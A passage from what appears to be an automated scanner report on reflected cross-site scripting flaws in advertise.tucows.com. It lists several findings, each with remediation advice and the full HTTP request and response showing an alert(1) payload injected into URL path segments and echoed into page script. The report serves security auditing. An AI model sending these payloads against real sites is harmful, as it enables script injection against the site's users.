Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:27 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/corpbarb9378"-alert(1)-"68cf811d6fc/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.7. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1d63"-alert(1)-"f61e34bb76a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar/cb3.0f1d63"-alert(1)-"f61e34bb76a/css/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:45 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/corpbar/cb3.0f1d63"-alert(1)-"f61e34bb76a/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.8. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8543"-alert(1)-"e7c1cf5b326 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar/cb3.0/cssf8543"-alert(1)-"e7c1cf5b326/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:55 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/corpbar/cb3.0/cssf8543"-alert(1)-"e7c1cf5b326/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.9. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 471ee"-alert(1)-"f64e6d809a6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar/cb3.0/css/style.css471ee"-alert(1)-"f64e6d809a6 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:57:07 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css471ee"-alert(1)-"f64e6d809a6";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.10. http://advertise.tucows.com/includes/js/aalib.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/aalib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6d10"-alert(1)-"e562c2cd8f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesa6d10"-alert(1)-"e562c2cd8f4/js/aalib.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:24 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includesa6d10"-alert(1)-"e562c2cd8f4/js/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.11. http://advertise.tucows.com/includes/js/aalib.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/aalib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33f2c"-alert(1)-"78bef03947c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js33f2c"-alert(1)-"78bef03947c/aalib.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:36 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js33f2c"-alert(1)-"78bef03947c/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.12. http://advertise.tucows.com/includes/js/aalib.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/aalib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22f00"-alert(1)-"b89799debf7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/aalib.js22f00"-alert(1)-"b89799debf7 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:52 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/aalib.js22f00"-alert(1)-"b89799debf7";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.13. http://advertise.tucows.com/includes/js/ajaxlib.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dffd4"-alert(1)-"6bee40325ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesdffd4"-alert(1)-"6bee40325ed/js/ajaxlib.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:19 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includesdffd4"-alert(1)-"6bee40325ed/js/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.14. http://advertise.tucows.com/includes/js/ajaxlib.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78547"-alert(1)-"ce4057ee76f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js78547"-alert(1)-"ce4057ee76f/ajaxlib.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:24 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js78547"-alert(1)-"ce4057ee76f/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.15. http://advertise.tucows.com/includes/js/ajaxlib.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46a92"-alert(1)-"496766b8176 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/ajaxlib.js46a92"-alert(1)-"496766b8176 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:38 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
